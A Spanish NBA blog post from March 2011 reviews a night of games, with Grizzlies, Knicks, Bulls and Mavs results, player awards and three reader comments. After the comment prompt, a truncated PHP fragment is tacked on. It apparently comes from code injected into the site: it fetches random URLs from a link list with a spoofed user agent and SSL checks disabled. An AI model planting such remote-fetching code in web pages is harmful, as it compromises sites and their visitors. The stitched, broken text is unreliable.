La Crónica (07/03/2011)

08 de March de 2011 por txusma

¿Van en serio estos Grizzlies? Hace dos días se cargaron a los Mavs y anoche se impusieron a los Thunder (101-107). 2 muescas de calidad en el revólver de Memphis que coinciden, casualmente, con la baja de Rudy Gay. En el partido de ayer todas las piezas funcionaron a la perfección. El juego interior que forman Zach Randolph y Marc Gasol debería ser considerado de los mejores de la liga y, exceptuando al de los Lakers, no tiene rival en el Oeste. Con Tony Allen en un gran momento de forma aportando defensa y más defensa y un Conley más que correcto, los Grizzlies parecen haber llegado a su justo punto de madurez. Veremos cómo les afecta la vuelta de Gay.

Con esta victoria, los ositos aguantan las embestidas de Houston, que de deshizo sin problemas de los Kings (123-101) y sobre todo de Portland, que se aprovechó de la baja de Howard para vencer a unos Magic (89-85) donde tan solo Jason Richardson plantó cara. Utah se descuelga un poco más tras ser arrollado por los Knicks (109-131) en una noche impecable de Melo&Stodaumire. Al Jefferson se volvió a marcar un partido soberbio y los Jazz volvieron a perder. ¿A alguien le recuerda a Minnesota?

Jugaron también anoche los número 2 de ambas conferencias. Los Bulls se impusieron a los Hornets con dificultades a pesar de que estos no contaban con Chris Paul, baja tras un golpe con Ramon Sessions en el partido frente los Cavs. Chicago se relajó en exceso y acabó sudando para llevarse la victoria (77-85), lo mismo que Dallas en un partido en el que Brian Cardinal fue destacado protagonista al cubrir la baja de Dirk Nowitzi, sentado buena parte del partido por problemas de faltas (108-105).

En el partido intrascendente de la noche, los Clippers ganaron (cómo no) a los Bobcats (92-87). Y eso que Eric Gordon sigue lesionado.

PREMIOS

MVP: Primer gran, gran partido de Carmelo Anthony con los Knicks. 34 puntos en una buena serie de 12 de 16 en tiros de campo. En la gran manzana esperan más como esta.

Rookie: Premio para Demarcus Cousins con su 20-11. Blake Griffin no se quedó lejos con 17-15 y hasta Derrick Favors tuvo un partido destacado de 16-8.

Sorpresa: Toney Douglas se ha encontrado con el puesto de base titular y lo está aprovechando a la perfección. Anoche fueron 20 puntos y 6 asistencias.

Decepción: Entre Jameer Nelson y Gilbert Arenas perdieron 11 balones. Imposible ganar a nadie así y menos si falta tu mejor jugador.

Esfuerzo en vano: Tal para cual. Al Jefferson, 36 puntos y 12 rebotes. Kevin Love, 23 puntos, 17 rebotes y 5 asistencias. El mismo resultado. Se nota que hasta hace bien poco eran compañeros de equipo.

Imágenes | AP Photos / Getty Images

Comenta

3 comentarios a esta entrada

  1. Pop dice:
    #1

    Y Love iguala el récord de dobles-dobles consecutivos de M.Malone…

      Citar

  2. MagicJohnson32 dice:
    #2

    Pues quién lo iba a decir, pero los Grizzlies pueden ser un rival muy incómodo en primera ronda de Playoffs. Ya estaban jugando muy bien con Gay pero su lesión ha dado alas a Allen y Young, y ahora mismo funcionan de maravilla. Si Gay vuelve y el equipo sabe adaptarse pueden dar mucha guerra.

      Citar

  3. GreenPride dice:
    #3

    Los Grizzlies parecen en estos momentos el equipo más en forma del Oeste tras los Lakers y quizá junto a Portland. Si finalmente como parece llegan a Playoffs serán un rival incómodo para cualquiera sobre todo en mi opinión si ese rival son los Mavs a los que pueden hacer daño por dentro y se pueden emparejar bastante bien con ellos.
    Por otro lado, un día sin Howard sirve para ver que con esa banda los Magic no van a ningún lado. Su suerte esta temporada dependía de como jugasen Richardson, Arenas y Turkoglu tras el traspaso y salvo el primero los otros dos no dan para mucho al parecer. Suerte que en primera ronda se enfrentarán seguramente a los Hawks porque en mi opinión si jugasen con New York tendrían muy complicado pasar esa primera ronda. Lo de pasar de segunda ronda lo veo casi imposible para ellos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>